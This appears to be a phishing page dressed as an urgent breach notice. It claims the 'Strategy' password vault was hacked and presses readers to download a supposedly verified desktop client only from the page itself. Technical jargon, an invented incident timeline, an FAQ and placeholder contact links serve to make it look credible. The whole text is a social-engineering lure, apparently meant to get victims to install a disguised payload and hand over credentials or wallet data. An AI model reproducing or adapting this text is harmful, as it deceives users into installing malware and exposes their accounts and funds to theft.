CRITICAL SECURITY ALERT: Strategy Password Vault Compromised

    Strategy password vault has been hacked. To secure your password vault and protect your credentials, you must immediately download the new verified Strategy Desktop client from this page. Do not use any other download sources.

    Verify installer signatures and checksums. Only download from this page.

    Why Desktop Restore

    • Endpoint hardening & zero-trust re-authentication to neutralize token replay and session hijacking.
    • Cryptographic attestation and TPM/HSM-backed key material to protect secrets at rest and in use.
    • Deterministic ledger re-indexing with consensus-anchored checksums for integrity and non-repudiation.
    • Revoked legacy web tokens and shortened credential lifetimes to reduce residual attack surface.

    Incident Timeline

    Breach Discovered

    Suspicious session anomalies detected via SIEM/XDR correlation; potential credential access and token replay identified.

    Containment Initiated

    Immediate revocation of ephemeral web tokens; isolation of affected microservices; lateral movement blocked.

    Forensic Imaging & Threat Hunt

    Full artifact capture, IOC enumeration, and APT-grade TTP analysis; third-party forensics engaged.

    Desktop Recovery Channel Activated

    Web restore flow suspended; Strategy Desktop reinstated with cryptographic attestation and enforced MFA re-bind.

    Credential & Secret Rotation

    Service accounts, API keys, and session secrets rotated; least-privilege policies tightened.

    User Notification Campaign Initiated

    Direct outreach with restore steps and safeguards; progress tracked to SLA.

    Continuous Monitoring & Support

    Ongoing telemetry, anomaly triage, and dedicated response lines for affected users.

    FAQ

    Q1. What exactly happened?

    We identified a targeted exploitation of legacy web session flows that risked credential access, session hijacking, and token replay. While there is no evidence of decrypted on-device private keys, encrypted ledger metadata and indexes were at elevated risk. We treated the event as an advanced persistent threat (APT), escalated containment, and activated hardened restore procedures.

    Q2. Why must I use the Strategy Desktop app?

    The desktop client enforces endpoint hardening, zero-trust re-authentication, and TPM/HSM-backed key custody. It performs deterministic, checksum-verified ledger re-indexing and re-keys your session to eliminate any residual exposure from compromised web tokens.

    Q3. Are my ledger entries and saved information intact?

    Your ledger library is reconstructed from cryptographically anchored snapshots with tamper-evident checksums. If any inconsistency is detected, the restore halts and prompts you to contact support with the provided incident identifier.

    Q4. What security steps did Strategy take immediately?

    We revoked tokens, rotated secrets, patched services, and instrumented deeper detection across SIEM/XDR. We also engaged independent forensics for root-cause analysis (RCA) and validated eradication of any adversary footholds.

    Q5. How do I verify the installer I download?

    Check the published hashes and code-signing signatures displayed on this page. Do not install from third-party mirrors or links. If a signature or checksum doesn't match, stop and contact support.

    Q6. What should I do after restoring?

    Enable MFA, rotate any API keys you control, review recent activity, and ensure your OS and EDR are up to date. Keep the desktop client as your authoritative restore and management path until web flows are re-announced.

    Q7. Who can help if something looks wrong?

    Use the dedicated Security Response contacts listed below. Provide your incident identifier, platform, time of failure, and screenshots of any checksum or signature mismatch.

    Support & Verification

    Security Response (24/7): [insert contact or mailto:]

    Signature & Checksum Bulletin: [link placeholder]

    Transparency Report: [link placeholder]